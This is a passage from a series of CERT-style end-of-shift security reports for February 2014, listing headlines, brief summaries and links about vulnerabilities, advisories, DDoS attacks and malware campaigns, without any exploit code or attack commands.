*** Microsoft Internet Explorer 10 remote code execution exploit ***
---------------------------------------------
Microsoft Internet Explorer 10 remote code execution exploit, Use-after-free vulnerability in Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code via vectors in...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020123
*** The New Normal: 200-400 Gbps DDoS Attacks ***
---------------------------------------------
KrebsOnSecurity has been targeted by countless denial-of-service attacks intended to knock it offline. Earlier this week, KrebsOnSecurity was hit by easily the most massive and intense such attack yet -- a nearly 200 Gbps assault leveraging a simple attack method that industry experts say is becoming alarmingly common.
---------------------------------------------
http://krebsonsecurity.com/2014/02/the-new-normal-200-400-gbps-ddos-attacks/
*** More Malware Embedded in RTFs ***
---------------------------------------------
RTF (Rich Text Format) files have been used before by cybercriminals, but of late it seems their use of this format is becoming more creative. We have earlier talked about how CPL files were being embedded in RTF files and sent to would-be victims as an e-mail attachment. These CPL files would then proceed to download malicious ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/more-malware-emb…
*** More on HNAP - What is it, How to Use it, How to Find it, (Sat, Feb 15th) ***
---------------------------------------------
We've had a ton of discussion on the most recent set of home router vulnerabilities based on the HNAP protocol. But what is the HNAP protocol for, and why is it so persistently enabled? HNAP (Home Network Administration Protocol) is a network device management protocol, useful for anyone, but I think meant primarily for ISPs to manage fleets of ..
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17648&rss
*** Crowdfunding platform Kickstarter hacked ***
---------------------------------------------
The crowdfunding platform Kickstarter has fallen victim to a hacker attack. Beyond usernames and e-mail addresses, the hackers also accessed encrypted passwords.
---------------------------------------------
http://www.heise.de/security/meldung/Crowdfunding-Plattform-Kickstarter-geh…
*** Credentials in circulation: FTP servers of websites attacked ***
---------------------------------------------
Thousands of credentials for FTP servers are reportedly in circulation, including accounts for well-known websites. There have already been first cases in which malicious content was placed on websites such as that of the New York Times. (Virus, server applications)
---------------------------------------------
http://www.golem.de/news/zugangsdaten-im-umlauf-ftp-server-von-webseiten-an…
*** HP Data Protector EXEC_BAR Remote Command Execution ***
---------------------------------------------
Topic: HP Data Protector EXEC_BAR Remote Command Execution, import argparse import socket ..
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020134
*** WebSphere Application Server Multiple Java Vulnerabilities ***
---------------------------------------------
WebSphere Application Server Multiple Java Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/56778
*** Mapping Hacking Team's "Untraceable" Spyware ***
---------------------------------------------
Remote Control System (RCS) is sophisticated computer spyware marketed and sold exclusively to governments by Milan-based Hacking Team. Hacking Team was first thrust into the public spotlight in 2012 when RCS was used against award-winning Moroccan media outlet Mamfakinch, and United Arab Emirates (UAE) human rights activist Ahmed Mansoor. Most recently, Citizen Lab research found that RCS was used to target Ethiopian journalists in the Washington DC area.
---------------------------------------------
https://citizenlab.org/2014/02/mapping-hacking-teams-untraceable-spyware/
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 13-02-2014 18:00 − Friday 14-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Attacks via zero-day hole in Internet Explorer ***
---------------------------------------------
IE has a critical vulnerability through which a computer can be infected with malicious code while browsing. It is already being abused for targeted cyber attacks.
---------------------------------------------
http://www.heise.de/security/meldung/Angriffe-ueber-Zero-Day-Luecke-im-Inte…
http://www.securitytracker.com/id/1029765
http://www.kb.cert.org/vuls/id/732479
*** BSI warns admins: "Numerous German servers infected with Ebury rootkit" ***
---------------------------------------------
CERT-Bund has already located the Linux rootkit on hundreds of German servers; presumably considerably more are affected. Admins should test their systems now.
---------------------------------------------
http://www.heise.de/security/meldung/BSI-warnt-Admins-Zahlreiche-deutsche-S…
*** Bizarre attack infects Linksys routers with self-replicating malware ***
---------------------------------------------
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/9tO67obVxlY/story01…
*** Apple's iCloud sends and receives mail in plain text ***
---------------------------------------------
A brief re-test of Apple's iCloud mail services revealed that Apple's mail servers offer less protection against eavesdroppers than almost all other mail providers.
---------------------------------------------
http://www.heise.de/security/meldung/Apples-iCloud-verschickt-und-empfaengt…
*** DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure ***
---------------------------------------------
Today, at 2014-02-12 12:16:20 (CET), we became aware of a possible evasive/beneath the radar malvertising based g01pack exploit kit attack, taking place through the DoubleClick ad network using an advertisement featured at About.com. Investigating further, we were able to identify the actual domains/IPs involved in the campaign, and perhaps most interestingly, managed to establish a rather interesting connection between the name servers of one of the domains involved in the attacks, and what...
---------------------------------------------
http://www.webroot.com/blog/2014/02/14/doubleclick-malvertising-campaign-ex…
*** SYM14-004 Symantec Endpoint Protection Management Vulnerabilities ***
---------------------------------------------
On Tuesday, February 18, SEC Consult Vulnerability Lab, an Austrian-based security consultancy, is planning to release an advisory to the public regarding vulnerabilities that it found within Symantec Endpoint Protection. For additional information on the SYM14-004 vulnerability, read the Symantec Security Response SYM14-004 Security Advisory.
---------------------------------------------
http://www.symantec.com/business/support/index?page=content&id=TECH214866
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
http://www.heise.de/security/meldung/Update-fuer-kritische-Luecken-im-Syman…
*** CA 2E Web Option Unauthenticated Privilege Escalation ***
---------------------------------------------
Topic: CA 2E Web Option Unauthenticated Privilege Escalation Risk: Medium Text:Vulnerability title: Unauthenticated Privilege Escalation in CA 2E Web Option CVE: CVE-2014-1219 Vendor: CA Product: 2E W...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020111
http://www.securityfocus.com/archive/1/531064
*** GnuTLS Intermediate Certificate Processing Flaw May Let Remote Users Bypass Certificate Validation ***
---------------------------------------------
http://www.securitytracker.com/id/1029766
*** Bugtraq: Critical security flaws in Nagios NRPE client/server crypto ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531063
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 12-02-2014 18:00 − Thursday 13-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** In the wild: Phony SSL certificates impersonating Google, Facebook, and iTunes ***
---------------------------------------------
Bogus credentials may be enough to ensnare some smartphone apps, researchers say.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/_AvaaGHbDLo/story01…
*** Gameover Zeus most active banking trojan in 2013, researchers report ***
---------------------------------------------
The most active banking trojan of 2013 was the Gameover variant Zeus, according to the latest research by the experts with the Dell SecureWorks Counter Threat Unit.
---------------------------------------------
http://www.scmagazine.com/gameover-zeus-most-active-banking-trojan-in-2013-…
*** Decoding Domain Generation Algorithms (DGAs) - Part I ***
---------------------------------------------
Part 1 - Unpacking the binary to properly view it in IDA Pro
---------------------------------------------
http://vrt-blog.snort.org/2014/02/decoding-domain-generation-algorithms.html
*** Weekly Metasploit Update: Android WebView Exploit, Clipboard Monitor, and Mass Checks ***
---------------------------------------------
Weekly Metasploit Update: Android WebView Exploit, Clipboard Monitor, and Mass Checks
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/02/13/weekly-me…
*** TYPO3: Several vulnerabilities in third party extensions ***
---------------------------------------------
Several vulnerabilities have been found in the following third-party TYPO3 extensions: alpha_sitemap, femanager, ke_stats, outstats, px_phpids, smarty, wec_map
---------------------------------------------
http://typo3.org/news/article/several-vulnerabilities-in-third-party-extens…
*** python-gnupg Command Injection Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56616
*** Security Bulletin: Multiple vulnerabilities in current IBM SDK for Java for WebSphere Application Server January 2014 CPU ***
---------------------------------------------
Multiple security vulnerabilities exist in the IBM SDK for Java that is shipped with IBM WebSphere Application Server. CVE(s): CVE-2014-0411 Affected product(s) and affected version(s): SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.1, Version 8.0.0.0 through 8.0.0.8, Version 7.0.0.0 through 7.0.0.31, Version 6.1.0.0 through 6.1.0.47 Refer to the following reference URLs for remediation and additional vulnerability details.
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Drupal - Vulnerabilities in third-party Contributions ***
---------------------------------------------
https://drupal.org/node/2194135
https://drupal.org/node/2194589
https://drupal.org/node/2194621
https://drupal.org/node/2194639
https://drupal.org/node/2194655
https://drupal.org/node/2194671
https://drupal.org/node/2194809
https://drupal.org/node/2194877
*** SAP NetWeaver Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56947
*** Juniper Networks - 2014-02 Security Threat Response Manager: Multiple vulnerabilities ***
---------------------------------------------
Product Affected: STRM series devices and virtual machines with STRM software releases: 2010.0, 2012.0, 2012.1, 2013.1, 2013.2
---------------------------------------------
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10614
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 11-02-2014 18:00 − Wednesday 12-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Security update available for Adobe Shockwave Player (APSB14-06) ***
---------------------------------------------
A Security Bulletin (APSB14-06) has been published regarding an update for Adobe Shockwave Player 12.0.7.148 and earlier for Windows and Macintosh. This update addresses critical vulnerabilities that could potentially allow an attacker to remotely take control of the affected system.
---------------------------------------------
http://blogs.adobe.com/psirt/?p=1051
*** Assessing risk for the February 2014 security updates ***
---------------------------------------------
Today we released seven security bulletins addressing 31 unique CVEs. Four bulletins have a maximum severity rating of Critical while the other three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.
---------------------------------------------
https://blogs.technet.com/b/srd/archive/2014/02/11/assessing-risk-for-the-f…
*** Vulnerability in Microsoft Forefront Protection for Exchange Could Allow Remote Code Execution (2927022) ***
---------------------------------------------
This security update resolves a privately reported vulnerability in Microsoft Forefront. The vulnerability could allow remote code execution if a specially crafted email message is scanned. This security update is rated Critical for all supported builds of Microsoft Forefront Protection for Exchange 2010.
---------------------------------------------
http://technet.microsoft.com/en-us/security/bulletin/ms14-008
*** Attacking ICS Systems "Like Hacking in the 1980s" ***
---------------------------------------------
Here's how nuts the world of ICS security is: Jonathan Pollet, a security consultant who specializes in ICS systems, was at a Texas amusement park recently and the ride he was waiting for was malfunctioning. The operator told him the ride used a Siemens PLC as part of the control system, so he went...
---------------------------------------------
http://threatpost.com/attacking-ics-systems-like-hacking-in-the-1980s/104200
*** CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries ***
---------------------------------------------
In this article I will discuss CVE-2014-0050: Apache Commons FileUpload and Apache Tomcat Denial-of-Service in detail. The article reviews the vulnerability's technical aspects in depth and includes recommendations that can help administrators defend from future exploitation of this security issue. How do we know about this vulnerability? About five days ago, Mark Thomas, a Project Management Committee Member and Committer in the Apache Tomcat project, sent an email about the accidentally leaked
---------------------------------------------
http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-lo…
*** Suspected Mass Exploit Against Linksys E1000 / E1200 Routers, (Wed, Feb 12th) ***
---------------------------------------------
Brett, who operates an ISP in Wyoming, notified us that he had a number of customers with compromised Linksys routers these last couple of days. The routers, once compromised, scan port 80 and 8080 as fast as they can (saturating bandwidth available). It is not clear which vulnerability is being exploited, but Brett eliminated weak passwords. E1200 routers with the latest firmware (2.0.06) appear to be immune against the exploit used. E1000 routers are end-of-life and don't appear to have an...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17621&rss
*** Cracking Linksys "Encryption" ***
---------------------------------------------
Perusing the release notes for the latest Linksys WRT120N firmware, one of the more interesting comments reads: Firmware 1.0.07 (Build 01) - Encrypts the configuration file. Having previously reversed their firmware obfuscation and patched their code to re-enable JTAG debugging, I thought that surely I would be able to use...
---------------------------------------------
http://www.devttys0.com/2014/02/cracking-linksys-crypto/
*** MSRT February 2014 - Jenxcus ***
---------------------------------------------
We have been seeing a lot more VBScript malware in recent months, thanks in most part to VBS/Jenxcus. Jenxcus is a worm coded in VBScript that is capable of propagating via removable drives. Its payload opens a backdoor on an infected machine, allowing it to be controlled by a remote attacker. For the past few months we have seen the number of affected machines remain constantly high. For this reason we have included Jenxcus in the February release of the Microsoft Malicious Software...
---------------------------------------------
https://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenx…
*** BSI recommends installing the Fritz!Box update urgently ***
---------------------------------------------
Router manufacturer AVM released an update for its Fritz!Box router models last weekend to close a vulnerability that became known the week before.
---------------------------------------------
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2014/Fritz-Box-U…
*** MatrikonOPC Improper Input Validation ***
---------------------------------------------
Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the MatrikonOPC SCADA DNP3 OPC Server application. MatrikonOPC has produced a patch that mitigates this vulnerability. The researchers have tested the patch to validate that it resolves the vulnerability. This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-010-01
*** Cisco Unified Communications Manager several Vulnerabilities ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** VU#727318: DELL SonicWALL GMS/Analyzer/UMA contains a cross-site scripting (XSS) vulnerability ***
---------------------------------------------
Vulnerability Note VU#727318 DELL SonicWALL GMS/Analyzer/UMA contains a cross-site scripting (XSS) vulnerability. Original Release date: 11 Feb 2014 | Last revised: 11 Feb 2014
Overview: DELL SonicWALL GMS/Analyzer/UMA version 7.1, and possibly earlier versions, contains a cross-site scripting (XSS) vulnerability. (CWE-79)
Description: CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting). DELL SonicWALL GMS/Analyzer/UMA version 7.1 contains a cross-site...
---------------------------------------------
http://www.kb.cert.org/vuls/id/727318
*** FreePBX 2.x Code Execution ***
---------------------------------------------
Topic: FreePBX 2.x Code Execution Risk: High Text:App : Freepbx 2.x download : schmoozecom.com Author : i-Hmx mail : n0p1337(a)gmail.com Home : sec4ever.com , secarrays ltd ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020088
*** TYPO3 - Several vulnerabilities in third party extensions ***
---------------------------------------------
http://typo3.org/news/article/several-vulnerabilities-in-third-party-extens…
http://typo3.org/news/article/several-vulnerabilities-in-extension-mm-forum…
http://typo3.org/news/article/access-bypass-in-extensions-yet-another-galle…
http://typo3.org/news/article/mass-assignment-in-extension-direct-mail-subs…
http://typo3.org/news/article/insecure-unserialize-in-extension-news-tt-new…
*** [webapps] - NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities ***
---------------------------------------------
http://www.exploit-db.com/exploits/31617
*** McAfee Firewall Enterprise OpenSSL OCSP Response Verification Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56930
https://secunia.com/advisories/56932
*** [webapps] - jDisk (stickto) v2.0.3 iOS - Multiple Vulnerabilities ***
---------------------------------------------
http://www.exploit-db.com/exploits/31618
*** MyBB Extended Useradmininfo Plugin "User-Agent" Script Insertion Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56921
*** Puppet Enterprise - CVE-2013-6393 (Threat of denial of service and potential for arbitrary code execution due to a flaw in libyaml) ***
---------------------------------------------
A flaw in the way `libyaml` parsed YAML tags could lead to a heap-based buffer overflow. An attacker could submit a YAML document that, when parsed by an application using `libyaml`, would cause the application to crash or potentially execute malicious code. This has been patched in PE 3.1.3.
---------------------------------------------
http://puppetlabs.com/security/cve/cve-2013-6393
*** FFmpeg Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56838
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 10-02-2014 18:00 − Tuesday 11-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Update (2/10) - Advance Notification Service for February 2014 Security Bulletin Release ***
---------------------------------------------
Update as of February 10, 2014 We are adding two updates to the February release. There will be Critical-rated updates for Internet Explorer and VBScript in addition to the previously announced updates scheduled for release on February 11, 2014. These updates have completed testing and will be included in tomorrow's release. This brings the total for Tuesday's release to seven bulletins, four Critical. Please review the ANS summary page for updated information to help customers...
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/02/10/advance-notification-ser…
*** IBM's remote firmware configuration protocol ***
---------------------------------------------
I spent last week looking into the firmware configuration protocol used on current IBM System x servers. IBM provide a tool called ASU for configuring firmware settings, either in-band (i.e., running on the machine you want to reconfigure) or out of band (i.e., running on a remote computer and communicating with the baseboard management controller - IMM in IBM-speak). I'm not a fan of using vendor binaries for this kind of thing. They tend to be large (ASU is a 20MB executable) and difficult to
---------------------------------------------
http://mjg59.dreamwidth.org/29210.html
*** The end of the magnetic stripe: USA switches to chip & PIN ***
---------------------------------------------
The USA is a stronghold of fraud with stolen credit card data. But from 2015 that is supposed to end: Visa and Mastercard are switching to the smartcard-chip cards that have long been standard in Europe.
---------------------------------------------
http://www.heise.de/security/meldung/Das-Ende-des-Magnetstreifens-USA-wechs…
*** Survey: Just 1 in 3 Euro biz slackers meets card security standards ***
---------------------------------------------
Yet PCI-DSS has largely been a failure, wails securo-bod
European businesses are lagging far behind the rest of the world in compliance with global payment card industry security standards, according to a new survey.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/02/11/pci_survey_…
*** NTP reflection: Cloudflare reports massive DDoS attack ***
---------------------------------------------
Network security provider Cloudflare has reported a massive DDoS attack on one of its customers during the night. It is said to be an NTP reflection attack larger than the attack on Spamhaus in mid-2013. (Server, DE-CIX)
---------------------------------------------
http://www.golem.de/news/ntp-reflection-cloudfare-meldet-massiven-ddos-angr…
*** Anti-theft software for notebooks as a gateway for attackers ***
---------------------------------------------
Security experts have scrutinized the Computrace application, which is often preinstalled on notebooks. Result: the software has a massive security hole. Moreover, it cannot always be deactivated.
---------------------------------------------
http://www.heise.de/security/meldung/Anti-Diebstahl-Software-fuer-Notebooks…
*** The Mask/Careto: Highly sophisticated cyber attack on energy companies ***
---------------------------------------------
The cyber weapon The Mask, which exploited vulnerabilities in Kaspersky software and in Adobe Flash Player, was active until January 2014. The malware works with a rootkit and a bootkit, has versions for Mac OS X, Linux, Android and iOS, and deletes its log files by overwriting them.
---------------------------------------------
http://www.golem.de/news/the-mask-careto-hochentwickelter-cyberangriff-auf-…
*** Blog: The Careto/Mask APT: Frequently Asked Questions ***
---------------------------------------------
The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007.
---------------------------------------------
http://www.securelist.com/en/blog/208216078/The_Careto_Mask_APT_Frequently_…
*** Five OAuth Bugs Lead to Github Hack ***
---------------------------------------------
A Russian researcher was able to take five low severity OAuth bugs and string them together to create what he calls a "simple but high severity exploit" in Github.
---------------------------------------------
http://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178
*** Your PenTest Tools Arsenal ***
---------------------------------------------
When it comes to information security, one of the major problems is setting up your PenTest Tools Arsenal. The truth is there are too many tools out there, and it would take forever to try half of them to see if they fit your needs. Over the years some well-established tools have emerged that most security professionals use, but that doesn't mean there are no lesser-known but still very good pentest tools out there.
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/02/11/your-pent…
*** Symantec Web Gateway Security Management Console Multiple Security Issues ***
---------------------------------------------
Symantec Web Gateway (SWG) Appliance management console is susceptible to both local and remote access cross-site scripting (XSS) and local access SQL injection (SQLi) vulnerabilities. Successful exploitation may result in an authorized user gaining unauthorized access to files on the management console or possibly being able to manipulate the backend database. There is also potential for remote hijacking of an authorized user session with associated privileges.
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Schneider ClearSCADA File Parsing Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56880
*** [webapps] - WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities ***
---------------------------------------------
http://www.exploit-db.com/exploits/31573
*** IBM WebSphere Portal Arbitrary File Upload Security Bypass Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56805
*** Bugtraq: Open-Xchange Security Advisory 2014-02-10 ***
---------------------------------------------
http://www.securityfocus.com/archive/1/531005
*** parcimonie (0.6 to 0.8, included) possible correlation between key fetches ***
---------------------------------------------
Topic: parcimonie (0.6 to 0.8, included) possible correlation between key fetches Risk: Low Text: Hi, Holger Levsen discovered that parcimonie [1], a privacy-friendly helper to refresh a GnuPG k...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020072
*** Joomla JomSocial Remote Code Execution Vulnerability ***
---------------------------------------------
The JomSocial team just released an update that fixes a very serious remote code execution vulnerability that affects any JomSocial version older than 3.1.0.4. From their hot-fix update: Yesterday we released version 3.1.0.4 which fixes two vulnerabilities. As a result of the first vulnerability, our own site was hacked. Thankfully, our security experts spotted the...
---------------------------------------------
http://blog.sucuri.net/2014/02/joomla-jomsocial-remote-code-execution-vulne…
*** Perl Regex Processing Flaw Lets Remote and Local Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1029735
*** Titan FTP Server 10.32 Build 1816 Directory Traversals ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020075
*** Avaya Call Management System (CMS) Security Issue and Two Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56926
*** Google Android addJavascriptInterface code execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90998
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 07-02-2014 18:00 − Monday 10-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Darkleech + Bitly.com = Insightful Statistics ***
---------------------------------------------
This post is about how hackers abuse popular web services, and how this helps security researchers obtain interesting statistics about malware attacks. We, at Sucuri, work with infected websites every day. While we see some particular infections on one site or on multiple sites, we can't accurately tell how many more sites out there are...
---------------------------------------------
http://blog.sucuri.net/2014/02/darkleech-bitly-com-insightful-statistics.ht…
*** The Internet is Broken - Act Accordingly ***
---------------------------------------------
Costin Raiu is a cautious man. He measures his words carefully and says exactly what he means, and is not given to hyperbole or exaggeration. Raiu is the driving force behind much of the intricate research into APTs and targeted attacks that Kaspersky Lab's Global Research and Analysis Team has been doing for the last...
---------------------------------------------
http://threatpost.com/the-internet-is-broken-act-accordingly/104141
*** Linkup ransomware blocks internet access, mines Bitcoins ***
---------------------------------------------
A trojan variant, Linkup, identified by Emsisoft, takes control of DNS servers, blocks internet access and mines Bitcoins.
---------------------------------------------
http://www.scmagazine.com/linkup-ransomware-blocks-internet-access-mines-bi…
*** February 2014 Threat Stats ***
---------------------------------------------
It's no surprise that this month's threat stats reveal that the largest breach to take place in December involved Target, where 40 million individuals were affected by the point-of-sale malware that swiped the data.
---------------------------------------------
http://www.scmagazine.com/february-2014-threat-stats/slideshow/1809/#0
*** iOS: Security Researcher Warns of DoS Possibility via Snapchat ***
---------------------------------------------
By reusing old app tokens it is reportedly possible to send large quantities of messages to users of the picture service, which is then said to cause problems for the iPhone as well. The problem is new to Snapchat.
---------------------------------------------
http://www.heise.de/security/meldung/iOS-Sicherheitsforscher-warnt-vor-DoS-…
*** Want to remotely control a car? $20 in parts, some oily fingers, and you're in command ***
---------------------------------------------
Spanish hackers have been showing off their latest car-hacking creation: a circuit board using untraceable, off-the-shelf parts worth $20 that can give wireless access to the car's controls while it's on the road.
---------------------------------------------
http://www.theregister.co.uk/2014/02/06/want_to_hack_a_car_20_in_parts_some…
*** Mac Trojan Steals Bitcoin Wallet Credentials ***
---------------------------------------------
A new Trojan for Mac OS X disguised as an app for sending and receiving payments steals Bitcoin wallet login credentials.
---------------------------------------------
http://threatpost.com/mac-trojan-steals-bitcoin-wallet-credentials/104152
*** Security Bulletin: Fix available for Cross Site Scripting vulnerabilities in IBM Connections Portlets for WebSphere Portal (CVE-2014-0855) ***
---------------------------------------------
A fix is available for Cross Site Scripting (XSS) vulnerabilities in IBM Connections Portlets for WebSphere Portal.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21663921
*** Bugtraq: [oCERT-2014-001] MantisBT input sanitization errors ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530980
*** Bugtraq: ASUS AiCloud Enabled Routers 12 Models - Authentication bypass and Sensitive file/path disclosure ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530985
*** Contao "Input::postRaw()" PHP Object Injection Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56755
*** Xerox ColorQube 8700 / 8900 Unspecified Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56889
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 06-02-2014 18:00 − Friday 07-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Advance Notification Service for February 2014 Security Bulletin Release ***
---------------------------------------------
Today we are providing advance notification for the release of five bulletins, two rated Critical and three rated Important, for February 2014. The Critical updates address vulnerabilities in Microsoft Windows and Security Software while the Important-rated updates address issues in Windows and the .NET Framework.
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/02/06/advance-notification-ser…
*** Syrian Electronic Army Nearly Takes Facebook Offline ***
---------------------------------------------
The hackers of the Syrian Electronic Army almost succeeded in hijacking Facebook's domain. They apparently gained access through the administration interface of the registrar MarkMonitor.
---------------------------------------------
http://www.heise.de/security/meldung/Syrian-Electronic-Army-nimmt-beinahe-F…
*** Bug in iOS 7: Remote Location Tracking Can Be Switched Off ***
---------------------------------------------
With a trick it is possible on iOS 7 devices to deactivate Apple's "Find My iPhone/iPad", which can also be used to recover a stolen device, without a password. The device must be unlocked for this, however.
---------------------------------------------
http://www.heise.de/security/meldung/Bug-in-iOS-7-Fernortung-laesst-sich-ab…
*** A Look at Malware with Virtual Machine Detection ***
---------------------------------------------
It's not uncommon for the malware of today to include some type of built-in virtual machine detection. Virtual Machines (VMs) are an essential part of a malware analyst's work environment. After all, we wouldn't want to infect our physical - or "bare-metal" computers - to all the...
---------------------------------------------
http://blog.malwarebytes.org/intelligence/2014/02/a-look-at-malware-with-vi…
*** Large-scale DNS redirection on home routers for financial theft ***
---------------------------------------------
In late 2013 CERT Polska received confirmed reports about modifications in e-banking websites observed on... iPhones. Users were presented with messages about alleged changes in account numbers that required confirmation with mTANs. This behavior would suggest that some Zeus-like trojan had been ported to iOS. As this would be the first confirmed case of such malware...
---------------------------------------------
https://www.cert.pl/news/8019/langswitch_lang/en
*** Fritzbox Attack Analysed: AVM Prepares Firmware Updates ***
---------------------------------------------
AVM has traced the attack path used for telephony abuse and is preparing firmware updates for Fritzboxes, which are expected to be released at the weekend.
---------------------------------------------
http://www.heise.de/security/meldung/Fritzbox-Angriff-analysiert-AVM-bereit…
*** Joomla! PROJOOM Smart Flash Header Component Arbitrary File Upload Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56831
*** Bugtraq: CVE-2014-1214 - Remote Code Execution in Projoom NovaSFH Plugin ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530938
*** Core FTP Server Vulnerabilities ***
---------------------------------------------
CVE-2014-1441: Race condition leading to Denial of Service on the "AUTH SSL" command with invalid SSL data
CVE-2014-1442: "XCRC" Directory Traversal Information Disclosure
CVE-2014-1443: Password Disclosure Vulnerability
---------------------------------------------
http://permalink.gmane.org/gmane.comp.security.full-disclosure/91518
*** Bugtraq: [SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530936
*** IBM Tealeaf CX Passive Capture Application remote code execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89228
*** IBM Tealeaf CX Passive Capture Application local file include ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89229
*** Symantec Encryption Management Server Web Email Protection information disclosure ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90946
*** Palo Alto Networks PAN-OS Certificate Invalidation on Master Key Change Security Bypass Security Issue ***
---------------------------------------------
https://secunia.com/advisories/56392
*** Schneider Electric SCADAPack VxWorks Debugger Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56811
*** osCommerce 2.3.3.4 SQL Injection ***
---------------------------------------------
Topic: osCommerce 2.3.3.4 SQL Injection Risk: Medium Text: # Title: osCommerce v2.x SQL Injection Vulnerability # Dork: Powered by osCommerce # Author: Ahmed Aboul-Ela # Contact: ahme...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020042
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 05-02-2014 18:00 − Thursday 06-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Target Hackers Broke in Via HVAC Company ***
---------------------------------------------
Last week, Target told reporters at The Wall Street Journal and Reuters that the initial intrusion into its systems was traced back to network credentials that were stolen from a third party vendor. Sources now tell KrebsOnSecurity that the vendor in question was a refrigeration, heating and air conditioning subcontractor that has worked at a number of locations at Target and other top retailers.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/JuvkO7plF2E/
*** Attacks on Fritzboxes: AVM Recommends Disabling Remote Configuration ***
---------------------------------------------
After initial cases of telephony abuse, attacks on Fritzboxes via remote configuration continue. To prevent damage, Fritzbox users should temporarily deactivate the function.
---------------------------------------------
http://www.heise.de/security/meldung/Angriffe-auf-Fritzboxen-AVM-empfiehlt-…
*** Demystifying Point of Sale Malware and Attacks ***
---------------------------------------------
